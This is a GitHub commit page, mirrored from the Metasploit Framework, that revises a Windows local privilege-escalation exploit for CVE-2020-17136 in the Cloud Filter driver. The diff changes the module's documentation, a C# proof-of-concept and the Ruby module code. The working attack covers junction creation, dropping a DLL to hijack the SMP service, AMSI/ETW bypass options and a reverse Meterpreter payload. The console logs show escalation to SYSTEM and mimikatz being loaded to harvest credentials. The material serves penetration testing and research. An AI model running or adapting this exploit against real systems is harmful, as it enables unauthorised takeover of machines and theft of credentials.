mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
Make second round of review edits to fix Spencer's comments
This commit is contained in:
parent
d5bb36c530
commit
3072391d00
Binary file not shown.
@ -7,21 +7,23 @@ security checks that would otherwise prevent a normal user from being able to cr
|
||||
they don't have permissions to create files in.
|
||||
|
||||
This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
|
||||
Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. The module
|
||||
then uses RPCSS named pipe impersonation to obtain a `SYSTEM` token and assign it to the current process,
|
||||
thereby allowing the attacker to execute arbitrary code as the `SYSTEM` user.
|
||||
Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. Users are
|
||||
strongly encouraged to set the `PAYLOAD` option to one of the Meterpreter payloads, as doing so will
|
||||
allow them to subsequently escalate their new session from `NETWORK SERVICE` to `SYSTEM` by using
|
||||
Meterpreter's `getsystem` command to perform RPCSS Named Pipe Impersonation and impersonate
|
||||
the `SYSTEM` user.
|
||||
|
||||
### Installation And Setup
|
||||
`cldflt.sys` should exist by default on all versions of Windows 10 v1803 and later.
|
||||
|
||||
## Verification Steps
|
||||
1. Start msfconsole
|
||||
2. Get a meterpreter shell as a low privileged user.
|
||||
2. Get a shell as a low privileged user.
|
||||
3. **Verify** that `getsystem` does not get you a `SYSTEM` shell.
|
||||
4. `use exploit/windows/local/cve_2020_17136`
|
||||
5. `set session *session id*`
|
||||
6. `run`
|
||||
7. **Verify** that you get a new shell as the `SYSTEM` user
|
||||
7. **Verify** that you get a new shell as the `N` user
|
||||
|
||||
## Options
|
||||
|
||||
@ -43,7 +45,7 @@ msf6 exploit(multi/handler) > run
|
||||
|
||||
[*] Started bind TCP handler against 172.22.152.177:4444
|
||||
[*] Sending stage (200262 bytes) to 172.22.152.177
|
||||
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-06 01:26:51 -0600
|
||||
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-08 11:17:11 -0600
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: DESKTOP-KUO5CML\normal
|
||||
@ -60,14 +62,6 @@ SeShutdownPrivilege
|
||||
SeTimeZonePrivilege
|
||||
SeUndockPrivilege
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-KUO5CML
|
||||
OS : Windows 10 (10.0 Build 19041).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 5
|
||||
Meterpreter : x64/windows
|
||||
meterpreter > getsystem
|
||||
[-] 2001: Operation failed: Access is denied. The following was attempted:
|
||||
[-] Named Pipe Impersonation (In Memory/Admin)
|
||||
@ -78,16 +72,20 @@ meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136
|
||||
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
|
||||
SESSION => 1
|
||||
msf6 exploit(windows/local/cve_2020_17136) > check
|
||||
[*] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
|
||||
msf6 exploit(windows/local/cve_2020_17136) > show options
|
||||
|
||||
Module options (exploit/windows/local/cve_2020_17136):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AMSIBYPASS true yes Enable Amsi bypass
|
||||
ETWBYPASS true yes Enable Etw bypass
|
||||
SESSION yes The session to run this module on.
|
||||
WAIT 5 no Time in seconds to wait
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AMSIBYPASS true yes Enable Amsi bypass
|
||||
ETWBYPASS true yes Enable Etw bypass
|
||||
SESSION 1 yes The session to run this module on.
|
||||
WAIT 5 no Time in seconds to wait
|
||||
|
||||
|
||||
Payload options (windows/x64/meterpreter/reverse_tcp):
|
||||
@ -106,36 +104,52 @@ Exploit target:
|
||||
0 Windows DLL Dropper
|
||||
|
||||
|
||||
msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
|
||||
SESSION => 1
|
||||
msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28
|
||||
LHOST => 172.22.159.28
|
||||
msf6 exploit(windows/local/cve_2020_17136) > set LPORT 6688
|
||||
LPORT => 6688
|
||||
msf6 exploit(windows/local/cve_2020_17136) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.22.159.28:6688
|
||||
[*] Started reverse TCP handler on 172.22.159.28:4444
|
||||
[*] Executing automatic check (disable AutoCheck to override)
|
||||
[+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
|
||||
[*] Dropping payload dll at C:\Windows\Temp\WsutUtXDcIsPqEKn.dll and registering it for cleanup...
|
||||
[*] Dropping payload dll at C:\Windows\Temp\BXNkequQiAvYxuVp.dll and registering it for cleanup...
|
||||
[*] Running module against DESKTOP-KUO5CML
|
||||
[*] Launching notepad.exe to host CLR...
|
||||
[+] Process 7784 launched.
|
||||
[*] Reflectively injecting the Host DLL into 7784..
|
||||
[*] Injecting Host into 7784...
|
||||
[*] Host injected. Copy assembly into 7784...
|
||||
[+] Process 100 launched.
|
||||
[*] Reflectively injecting the Host DLL into 100..
|
||||
[*] Injecting Host into 100...
|
||||
[*] Host injected. Copy assembly into 100...
|
||||
[*] Assembly copied.
|
||||
[*] Executing...
|
||||
[*] Start reading output
|
||||
[+] Key: 1821285265184
|
||||
[+] Sync connection key: 2733760425760
|
||||
[+] Done
|
||||
[*] End output.
|
||||
[+] Execution finished.
|
||||
[*] Sending stage (200262 bytes) to 172.22.152.177
|
||||
[*] Meterpreter session 2 opened (172.22.159.28:6688 -> 172.22.152.177:62867) at 2021-01-06 01:28:26 -0600
|
||||
[*] Session ID 2 (172.22.159.28:6688 -> 172.22.152.177:62867) processing AutoRunScript 'post/windows/escalate/getsystem'
|
||||
[+] Obtained SYSTEM via technique 4
|
||||
[*] Meterpreter session 2 opened (172.22.159.28:4444 -> 172.22.152.177:49968) at 2021-01-08 11:18:19 -0600
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\NETWORK SERVICE
|
||||
meterpreter > getprivs
|
||||
|
||||
Enabled Process Privileges
|
||||
==========================
|
||||
|
||||
Name
|
||||
----
|
||||
SeAssignPrimaryTokenPrivilege
|
||||
SeAuditPrivilege
|
||||
SeChangeNotifyPrivilege
|
||||
SeCreateGlobalPrivilege
|
||||
SeImpersonatePrivilege
|
||||
SeIncreaseQuotaPrivilege
|
||||
SeIncreaseWorkingSetPrivilege
|
||||
SeShutdownPrivilege
|
||||
SeTimeZonePrivilege
|
||||
SeUndockPrivilege
|
||||
|
||||
meterpreter > getsystem
|
||||
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > getprivs
|
||||
@ -157,7 +171,7 @@ SeTimeZonePrivilege
|
||||
SeUndockPrivilege
|
||||
|
||||
meterpreter > load kiwi
|
||||
Loading extension kiwi...cre
|
||||
Loading extension kiwi...
|
||||
.#####. mimikatz 2.2.0 20191125 (x64/windows)
|
||||
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
|
||||
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
|
||||
@ -198,8 +212,8 @@ normal DESKTOP-KUO5CML (null)
|
||||
test DESKTOP-KUO5CML (null)
|
||||
|
||||
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 2...
|
||||
meterpreter >
|
||||
Background session 2? [y/N]
|
||||
msf6 exploit(windows/local/cve_2020_17136) > sessions
|
||||
|
||||
Active sessions
|
||||
@ -208,7 +222,7 @@ Active sessions
|
||||
Id Name Type Information Connection
|
||||
-- ---- ---- ----------- ----------
|
||||
1 meterpreter x64/windows DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML 0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177)
|
||||
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML 172.22.159.28:6688 -> 172.22.152.177:62867 (172.22.152.177)
|
||||
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML 172.22.159.28:4444 -> 172.22.152.177:49968 (172.22.152.177)
|
||||
|
||||
msf6 exploit(windows/local/cve_2020_17136) >
|
||||
```
|
||||
|
@ -590,7 +590,7 @@ namespace POC_CloudFilter_ArbitraryFile_EoP
|
||||
CfConnectSyncRoot(SyncRoot, table, IntPtr.Zero, CF_CONNECT_FLAGS.CF_CONNECT_FLAG_NONE, out long key).Check();
|
||||
try
|
||||
{
|
||||
Console.WriteLine("Key: {0}", key);
|
||||
Console.WriteLine("Sync connection key: {0}", key);
|
||||
CF_PLACEHOLDER_CREATE_INFO[] place_holders = new CF_PLACEHOLDER_CREATE_INFO[1];
|
||||
place_holders[0].RelativeFileName = FilePath;
|
||||
CF_FS_METADATA meta_data = new CF_FS_METADATA
|
||||
|
@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
include Msf::Post::Windows::Dotnet
|
||||
include Msf::Post::Windows::Services
|
||||
include Msf::Post::Windows::FileSystem
|
||||
include Msf::Exploit::FileDropper
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
@ -20,17 +21,20 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
info,
|
||||
'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP',
|
||||
'Description' => %q{
|
||||
The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December 2020 updates,
|
||||
did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling
|
||||
FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker
|
||||
controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any
|
||||
security checks that would otherwise prevent a normal user from being able to create files in directories
|
||||
The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December
|
||||
2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when
|
||||
calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()
|
||||
function with attacker controlled input. This meant that files were created with
|
||||
KernelMode permissions, thereby bypassing any security checks that would otherwise
|
||||
prevent a normal user from being able to create files in directories
|
||||
they don't have permissions to create files in.
|
||||
|
||||
This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
|
||||
Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. The module
|
||||
then uses RPCSS named pipe impersonation to obtain a SYSTEM token and assign it to the current process,
|
||||
thereby allowing the attacker to execute arbitrary code as the SYSTEM user.
|
||||
This module abuses this vulnerability to perform a DLL hijacking attack against the
|
||||
Microsoft Storage Spaces SMP service, which grants the attacker code execution as the
|
||||
NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one
|
||||
of the Meterpreter payloads, as doing so will allow them to subsequently escalate their
|
||||
new session from NETWORK SERVICE to SYSTEM by using Meterpreter's "getsystem" command
|
||||
to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
@ -40,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
'Platform' => ['win'],
|
||||
'SessionTypes' => ['meterpreter'],
|
||||
'Privileged' => true,
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Arch' => [ARCH_X64],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],
|
||||
@ -62,7 +66,6 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
|
||||
'AUTORUNSCRIPT' => 'post/windows/escalate/getsystem'
|
||||
}
|
||||
)
|
||||
)
|
||||
@ -81,23 +84,6 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
)
|
||||
end
|
||||
|
||||
def find_required_clr(exe_path)
|
||||
filecontent = File.read(exe_path).bytes
|
||||
sign = 'v4.0.30319'.bytes
|
||||
filecontent.each_with_index do |_item, index|
|
||||
sign.each_with_index do |subitem, indexsub|
|
||||
break if subitem.to_s(16) != filecontent[index + indexsub].to_s(16)
|
||||
|
||||
if indexsub == 9
|
||||
vprint_status('CLR version required: v4.0.30319')
|
||||
return 'v4.0.30319'
|
||||
end
|
||||
end
|
||||
end
|
||||
vprint_status('CLR version required: v2.0.50727')
|
||||
'v2.0.50727'
|
||||
end
|
||||
|
||||
def check_requirements(clr_req, installed_dotnet_versions)
|
||||
installed_dotnet_versions.each do |fi|
|
||||
if clr_req == 'v4.0.30319'
|
||||
@ -116,7 +102,6 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
|
||||
def check
|
||||
sysinfo_value = sysinfo['OS']
|
||||
|
||||
if sysinfo_value !~ /windows/i
|
||||
# Non-Windows systems are definitely not affected.
|
||||
return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
|
||||
@ -153,23 +138,29 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
def exploit
|
||||
if sysinfo['Architecture'] != 'x64'
|
||||
fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')
|
||||
elsif session.arch != 'x64'
|
||||
fail_with(Failure::NoTarget, 'Sorry, WoW64 is not supported at this time!')
|
||||
end
|
||||
dir_junct_path = 'C:\\Windows\\Temp'
|
||||
intermediate_dir = rand_text_alpha(10).to_s
|
||||
junction_dir = rand_text_alpha(10).to_s
|
||||
path_to_intermediate_dir = "#{dir_junct_path}\\#{intermediate_dir}"
|
||||
|
||||
cd(dir_junct_path)
|
||||
mkdir(intermediate_dir)
|
||||
if !directory?("#{dir_junct_path}\\#{intermediate_dir}")
|
||||
mkdir("#{path_to_intermediate_dir}")
|
||||
if !directory?("#{path_to_intermediate_dir}")
|
||||
fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')
|
||||
end
|
||||
register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}")
|
||||
register_dir_for_cleanup("#{path_to_intermediate_dir}")
|
||||
|
||||
cmd_exec("cmd.exe /C \"mklink /J #{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir} C:\\\"")
|
||||
if !directory?("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}")
|
||||
fail_with(Failure::UnexpectedReply, 'Could not create the junction directory!')
|
||||
mkdir("#{path_to_intermediate_dir}\\#{junction_dir}")
|
||||
if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
|
||||
fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!')
|
||||
end
|
||||
|
||||
mount_handle = create_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", 'C:\\')
|
||||
if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
|
||||
fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')
|
||||
end
|
||||
register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}")
|
||||
|
||||
exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'
|
||||
unless File.file?(exe_path)
|
||||
@ -180,17 +171,18 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
if installed_dotnet_versions == []
|
||||
fail_with(Failure::BadConfig, 'Target has no .NET framework installed')
|
||||
end
|
||||
rclr = find_required_clr(exe_path)
|
||||
if check_requirements(rclr, installed_dotnet_versions) == false
|
||||
if check_requirements('v4.0.30319', installed_dotnet_versions) == false
|
||||
fail_with(Failure::BadConfig, 'CLR required for assembly not installed')
|
||||
end
|
||||
payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
|
||||
print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
|
||||
write_file(payload_path, generate_payload_dll)
|
||||
register_file_for_cleanup(payload_path)
|
||||
execute_assembly(exe_path, "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
|
||||
execute_assembly(exe_path, "#{path_to_intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
|
||||
service_start('smphost')
|
||||
register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll')
|
||||
sleep(3)
|
||||
delete_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", mount_handle)
|
||||
end
|
||||
|
||||
def pid_exists(pid)
|
||||
|
Loading…
Reference in New Issue
Block a user